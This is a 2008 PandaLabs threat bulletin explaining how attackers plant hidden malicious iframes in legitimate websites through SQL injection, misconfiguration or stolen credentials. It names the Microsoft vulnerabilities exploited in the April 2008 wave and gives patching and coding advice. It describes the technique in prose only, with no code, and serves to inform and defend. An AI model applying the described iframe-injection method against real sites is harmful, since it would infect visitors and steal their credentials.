- PandaLabs - Everything you need to know about Internet threats – www.pandalabs.com - - 1 – ____________________________________________________________________________________________________________

_____________________________________________________________________________________

PandaLabs Bulletins: Legitimate Webs in jeopardy _____________________________________________________________________________________

© Panda Security 2008 | PandaLabs www.pandasecurity.com/homeusers/security_info | www.pandalabs.com © Panda Security 2008 | PandaLabs www.pandasecurity.com/homeusers/security_info | www.pandalabs.com

- PandaLabs – Everything you need to know about Internet threats - www.pandalabs.com - - 2 – ____________________________________________________________________________________________________________

Index 1.2.3.4.5.-

Introduction ..........................................................................................................................................3 Modus operandi....................................................................................................................................3 The most notable case ........................................................................................................................4 Trends....................................................................................................................................................5 How to ensure you are protected? ....................................................................................................5

© Panda Security 2008 | PandaLabs www.pandasecurity.com/homeusers/security_info | www.pandalabs.com

- PandaLabs - Everything you need to know about Internet threats – www.pandalabs.com - - 3 – ____________________________________________________________________________________________________________

1.- Introduction Although awareness regarding Internet threats has evolved, many users still believe that if you keep away from dubious Web pages you will avoid malware infection. Malware on the Internet is usually associated with malicious or suspicious Web pages, but not with legitimate ones. However, since no system is 100% secure, cyber-crooks take advantage of the trust users have of specific domains to drop malicious code on their systems. This technique is mainly being used to spread malware, but it could also be employed to distribute spam or store stolen data. This article provides an insight into these types of attacks, specific cases and possible future trends. Additionally, several tips have been included to prevent you from falling victim to these attacks.

2.- Modus operandi Legitimate Web page infection consists of modifying the Web page source code by adding an iframe-type reference pointing to a malicious server. Cyber-crooks can infect Web pages in several different ways: 1. By exploiting vulnerabilities in the software installed on a server. 2. Through bad configuration of the programs installed and running. 3. By stealing passwords for accessing the server using Trojans. At least one of the above conditions must be met to modify the Web page source code. These techniques allow cyber-crooks, in addition to infecting the corporate website, to use the servers for a range of malicious actions, including hosting a program designed to infect visitors, distributing spam or storing stolen data. Once they manage to access the Web page, cyber-crooks add an iframe-type reference at the end of the file loaded by default, pointing to the malicious server. Initially, users don’t suspect a thing since the modification is made on the HTML code of the legitimate Web page, and is invisible to users. This way, when users visit a Web page to which cyber-crooks have added a malicious iframe, the iframe establishes a connection (transparent to users) with a page that checks the computer for specific vulnerabilities. If the computer is updated against the vulnerabilities, users will not be infected. If it isn’t, the malware –which is normally designed to steal passwords- will be automatically downloaded. The fact the malware distributed is a password stealer is not a coincidence, since maximum efficiency would land large financial benefits in cyber-crooks’ hands. This malware captures all types of confidential information (passwords, user names, email addresses) which hackers can use for subsequent fraudulent actions.

© Panda Security 2008 | PandaLabs www.pandasecurity.com/homeusers/security_info | www.pandalabs.com

- PandaLabs - Everything you need to know about Internet threats – www.pandalabs.com - - 4 – ____________________________________________________________________________________________________________

As for the exploits used to infect users, initially they were often related to the operating system. However, users that had applied the corresponding patches to their operating systems weren’t infected other than by zero-day exploits for which no patch had been released. Consequently, attackers began to widen their scope, targeting browsers such as Internet Explorer or Firefox, and popular applications; Windows Media Player, QuickTime, Acrobat, Flash Player, etc. The diagram below has been included to better explain these types of attacks:

Example of an iframe-type attack

The process described is as follows: 1. To start with, several legitimate Web pages have been modified through the insertion of a malicious iframe, http://www..com/1.js in the example. 2. When users visit an infected legitimate Web page, the iframe connects to a Web page, in this case: http://www..com/1.htm. This connection is imperceptible to users. 3. This Web page has a list of vulnerabilities it tries to exploit on the affected system. 4. Upon detecting a vulnerability, the malware is downloaded.

3.- The most notable case One of the most notable trends this year has been the SQL Injection attacks affecting hundreds of thousands of servers. These types of attacks have enabled iframe insertion on Web pages. Numerous compromised servers were detected at the beginning of April. Their pages were modified to include an iframe that pointed to a server which exploited several vulnerabilities, such as:    

MS06-014: Vulnerability in the Microsoft Data Access Components (MDAC) Function. MS07-004: Vulnerability in Vector Markup Language. MS07-018: Vulnerabilities in Microsoft Content Management Server. MS07-033 : Cumulative Security Update for Internet Explorer

© Panda Security 2008 | PandaLabs www.pandasecurity.com/homeusers/security_info | www.pandalabs.com

- PandaLabs - Everything you need to know about Internet threats – www.pandalabs.com - - 5 – ____________________________________________________________________________________________________________



MS07-055 : Vulnerability in Kodak Image Viewer.

These vulnerabilities were exploited to distribute different types of malware. These were highly organized SQL Injection attacks. Due to the large number of affected servers, the attack must have been automated, using a tool specifically developed to scan servers and analyze the chances of SQL Injection attacks on each server. One of the most successful SQL Injection attacks was detected at the beginning of April and affected half a million Web pages. A problem programming specific asp-type pages allowed the insertion of the malicious iframe on hundreds of thousands of pages.

4.- Trends When these cases came to light, users panicked, since millions of legitimate and reliable pages were infected. Despite the seriousness of the situation, the number of affected pages has decreased significantly, since their administrators took the necessary measures to resolve the problem and prevent their servers’ pages from being infected. The number of infected pages is expected to continue decreasing, since Web administrators are now better informed. However, if a zero-day exploit appears, until the corresponding patch is published, cyber-crooks could revive these attacks. On the other hand, before these attacks appeared, several kits for installing malware through exploits were developed, e.g. Mpack. These types of tools are designed to exploit vulnerabilities for malware distribution. In this case, they are pages designed by cyber-crooks who usually use names similar to the legitimate ones to fool users.

5.- How to ensure you are protected? From a user’s point of view, to avoid infection systems must be up-to-date against known vulnerabilities, and complemented with an antivirus with up-to-date proactive technologies. From an administrator’s point of view, servers must be up-to-date so no vulnerabilities appear, and administrators must make sure the pages that can access their database are correctly programmed and the server passwords are frequently modified to prevent people with malicious intentions from using them.

© Panda Security 2008 | PandaLabs www.pandasecurity.com/homeusers/security_info | www.pandalabs.com

PandaLabs Bulletins - RED Team Cyber Security

Once they manage to access the Web page, cyber-crooks add an iframe-type reference at the end of the file loaded by default, pointing to the malicious server.
Download PDF
133KB Sizes 7 Downloads 244 Views
Report

Recommend Documents

PandaLabs Bulletins - RED Team Cyber Security
banks have increased security measures on their websites, these malicious codes have become more sophisticated and include new functions. One of the ...
PandaLabs Bulletins - RED Team Cyber Security
adding an iframe-type reference pointing to a malicious server. ... don't suspect a thing since the modification is made on the HTML code of the legitimate ... malware captures all types of confidential information (passwords, user names, email.
PandaLabs Bulletins - RED Team Cyber Security
Panda Security 2008 | PandaLabs .... Security problems in Facebook . .... The Google Trend graph below illustrates the number of searches made by users for a.
PandaLabs Bulletins - RED Team Cyber Security
banks have increased security measures on their websites, these malicious codes have ... Social engineering continues to be among the most popular means for ..... PandaLabs - Everything you need to know about Internet threats – www.pandalabs.com -
PandaLabs Bulletins - Panda Security
One of the greatest concerns to users regarding Internet security is the theft of confidential information, such as passwords, particularly those for bank accounts. That's why banker Trojans are considered one of the most dangerous types of malware f
PandaLabs Bulletins - Panda Security
Social networking sites can be defined as “web-based services that allow .... Most attacks have targeted the most popular social networks such as MySpace,.
PandaLabs Bulletins - Panda Security
use the servers for a range of malicious actions, including hosting a program designed to infect visitors, distributing spam or storing stolen data. Once they manage to ... malware captures all types of confidential information (passwords, user names
PandaLabs Bulletins - Panda Security
Although awareness regarding Internet threats has evolved, many users still believe that if you keep away from dubious Web pages you will avoid malware infection. Malware on the Internet is usually associated with malicious or suspicious Web pages, b
PandaLabs Bulletins - Panda Security
exploited a feature of Apple's QuickTime player to spread a worm in files that tried ... claimed that a Canadian pornography company had hacked the accounts of.
PandaLabs Bulletins - 123SeminarsOnly.com
carefully calculated in order to exploit: Significant events or ... In fact, on January 26, we published a post on the PandaLabs blog warning of a wave of Waledacs ...
PandaLabs Bulletins - 123SeminarsOnly.com
Email messages using social engineering techniques continue to be one of malware‟s ... This was simply another example of social engineering. ..... http://pandalabs.pandasecurity.com/archive/Malware-Campaign-Impersonates-Barack-.
Annual Report PandaLabs 2009 - Panda Security
As for distribution methods, social networks have made the headlines in .... obtained through analyses carried out by the online tool. ActiveScan .... course: 2009 – The year at a glance. FIG.07. EVOLUCIÓN DE MALWARE ACTIVO. DURANTE EL TERCER TRIM
Annual Report PandaLabs 2009 - Panda Security
offenses. In May, part of the network of the US Marshals. (a division of the US Justice Department) had to be disconnected to remedy an infection. These cases are not isolated events; they reflect what is happening in the world. The main lesson here
Cyber Security Rules.pdf
Page 2 of 2. Page 2 of 2. Cyber Security Rules.pdf. Cyber Security Rules.pdf. Open. Extract. Open with. Sign In. Main menu. Displaying Cyber Security Rules.pdf.Missing:
Cyber Security Rules.pdf
Sign in. Loading… Whoops! There was a problem loading more pages. Retrying... Whoops! There was a problem previewing this document. Retrying.
Informe Pandalabs 1 trimestre 2010-EN.indd - Panda Security
IC3 website, and therefore excludes complaints made to banks, local or ... Yet social networks have played more than just a supporting ... be downloaded and installed from MS10-002. ... In early March, it was announced that the largest botnet.
Informe PandaLabs 2 trimestre 2010-EN.indd - Panda Security
Facebook has been in the news for all types of reasons, many of which were of its own making: from an error that allowed access to details of users' contacts, to changes in the privacy settings which caused data to be exposed without users' knowledge
Informe Pandalabs 1 trimestre 2010-EN.indd - Panda Security
One of its conclusions is that online crime complaints have increased by 22.3% ..... (Virtual Private Network) services, preventing us from identifying their real IP ...
Cyber Security white paper.pdf
Page 1 of 7. CYBER SECURITY WHITE PAPER. Written for the California Community Colleges Chancellor's Office. August 2015. Page 1 of 7 ...
Cyber-Security-Tip-Sheet-Malware.pdf
Cyber-Security-Tip-Sheet-Malware.pdf. Cyber-Security-Tip-Sheet-Malware.pdf. Open. Extract. Open with. Sign In. Main menu. Displaying ...
Big Red Relays Team Scores.pdf
Licensed to Aztec High School HY-TEK's Meet Manager 2/25/2017. Big Red Relays - 2/25/2017. Belton. Team Rankings ... 10 Brownwood BRWD 13. 11 China Spring CHSP 10. 12 Waco WACO 6. Page 1 of 1. Big Red Relays Team Scores.pdf. Big Red Relays Team Score
Big Red Relays Team Scores.pdf
Page 1 of 1. file:///C|/Users/e125249/Downloads/Scores.htm[2/26/2017 11:35:38 AM]. Licensed to Aztec High School HY-TEK's Meet Manager 2/25/2017.